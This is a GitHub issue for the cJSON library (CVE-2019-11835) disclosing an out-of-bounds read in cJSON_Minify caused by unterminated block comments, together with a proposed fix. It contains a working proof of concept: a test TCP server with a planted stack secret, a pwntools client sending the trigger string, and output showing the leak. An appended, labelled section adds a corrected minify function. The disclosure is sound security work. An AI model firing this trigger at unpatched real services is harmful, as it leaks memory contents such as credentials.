Closed
Description
https://github.com/DaveGamble/cJSON/blob/master/cJSON.c : 2669
This bug can delete the \x00 terminator and read and write out of bounds; if str* APIs are then used on the result, they will fault and cause logical problems such as stack and heap overflows, information leaks, etc.
```c
else if ((*json == '/') && (json[1] == '*'))
{
    /* multiline comments. */
    while (*json && !((*json == '*') && (json[1] == '/')))
    {
        json++;
    }
    json += 2;
}
```
This should be coded as below:
```c
else if ((*json == '/') && (json[1] == '*'))
{
    /* multiline comments. */
    while (*json && !((*json == '*') && (json[1] == '/')))
    {
        json++;
    }
    if (!(*json))
    {
        /* unterminated comment: the cursor is on the NUL, so stop here
           (break out of the minify loop, or return) instead of skipping it */
        break;
    }
    json += 2;
}
```
Just leaking stack data for the test:
server.c
```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include "cJSON.h"

int main(int argc, const char* argv[]) {
    int lfd = socket(AF_INET, SOCK_STREAM, 0);
    struct sockaddr_in serv_addr;
    memset(&serv_addr, 0, sizeof(serv_addr));
    serv_addr.sin_family = AF_INET;
    serv_addr.sin_port = htons(880);
    serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
    bind(lfd, (struct sockaddr*)&serv_addr, sizeof(serv_addr));
    listen(lfd, 64);
    struct sockaddr_in clien_addr;
    socklen_t clien_len = sizeof(clien_addr);
    int cfd = accept(lfd, (struct sockaddr*)&clien_addr, &clien_len);
    char ipbuf[128];
    printf("client iP: %s, port: %d\n", inet_ntop(AF_INET, &clien_addr.sin_addr.s_addr, ipbuf, sizeof(ipbuf)),
           ntohs(clien_addr.sin_port));
    /* leakdata1 sits next to buf on the stack; it is what the overread exposes */
    char leakdata1[16] = "passwordpassword";
    char buf[16] = {0};
    memset(buf, 0, 16);
    while(1) {
        int len = read(cfd, buf, sizeof(buf));
        if (len <= 0) break;  /* client closed or read failed */
        printf("recv bufdata = %s\n", buf);
        cJSON_Minify(buf);
        printf("After cJSON_Minify, bufdata:\n%s\n", buf);
    }
    close(cfd);
    close(lfd);
    return 0;
}
```
The client just sends the data below (15 bytes, no buffer overflow):
```python
from pwn import *
p = remote('127.0.0.1', 880)
p.send('/*abcdefghjklmn')
raw_input('waiting...')
```
Output:
```text
client iP: 127.0.0.1, prot: 39284
recv bufdata = /*abcdefghjklmn
After cJSON_Minify, bufdata:
asswordpassword127.0.0.1
```
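As an added example (not from the issue or from cJSON itself), the unterminated-comment case worked through: the index the original loop hands back, and a small in-place minify written in the corrected form. `minify_fixed` is a simplified stand-in for cJSON_Minify, not the library's code; the input strings are constructed for the example.

```c
#include <stddef.h>
#include <string.h>

/* Index the original loop leaves the cursor on: it stops at the NUL of an
 * unterminated block comment and then adds 2 unconditionally. For the issue's
 * 15-byte payload (plus NUL) that is 17, two bytes past the terminator, which
 * is where "asswordpassword" sits if leakdata1 follows buf on the stack.
 * Only index arithmetic here; nothing beyond the NUL is read. */
size_t vulnerable_skip_index(const char *json)
{
    size_t i = 0;
    if (!(json[0] == '/' && json[1] == '*')) return 0;
    while (json[i] && !(json[i] == '*' && json[i + 1] == '/')) i++;
    return i + 2;  /* overshoots whenever json[i] == '\0' */
}

/* Simplified in-place minify in the corrected form (a stand-in for cJSON_Minify,
 * not the library's code): strips whitespace and both comment styles, keeps
 * strings intact, and treats an unterminated block comment as end of input.
 * Returns the minified length; the buffer is always NUL-terminated. */
size_t minify_fixed(char *json)
{
    char *start = json, *into = json;
    while (*json) {
        if (strchr(" \t\r\n", *json)) {
            json++;
        } else if (*json == '/' && json[1] == '/') {
            while (*json && *json != '\n') json++;
        } else if (*json == '/' && json[1] == '*') {
            json += 2;
            while (*json && !(*json == '*' && json[1] == '/')) json++;
            if (!*json) break;  /* unterminated: stop instead of skipping the NUL */
            json += 2;
        } else if (*json == '"') {
            *into++ = *json++;
            while (*json && *json != '"') {
                if (*json == '\\' && json[1]) *into++ = *json++;  /* keep escape pair */
                *into++ = *json++;
            }
            if (*json) *into++ = *json++;
        } else {
            *into++ = *json++;
        }
    }
    *into = '\0';
    return (size_t)(into - start);
}
```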
Activity
bigric3 commented on Feb 23, 2019
@kbranigan @DaveGamble @ecksun @jwilk
ecksun commented on Feb 23, 2019
I'm confused, why did you highlight me? What can I help you with?
bigric3 commented on Feb 25, 2019
Sorry, when I typed '@', your name appeared automatically; I thought you were an admin of cJSON.
ecksun commented on Mar 3, 2019
Ah, I see, no, I'm not, sorry for that.
FSMaxB commented on Apr 12, 2019
Sorry for taking so long to respond. It has been hard to find any free time to work on this lately.
FSMaxB commented on Apr 12, 2019
There is indeed a problem here and looking at cJSON_Minify a bit more I think there is at least one more. cJSON_Minify is probably the one function that I looked at the least in cJSON ... I'll take a closer look at the entire function and address all upcoming issues.
Rewrite cJSON_Minify, fixing buffer overflows, fixes #338
package/cjson: security bump to version 1.7.11
ddillard commented on May 1, 2019
Has anyone requested a CVE for this yet? Just saw CVE-2016-10749 finally get published for a different issue?
carnil commented on May 9, 2019
CVE-2019-11835 was assigned for this issue.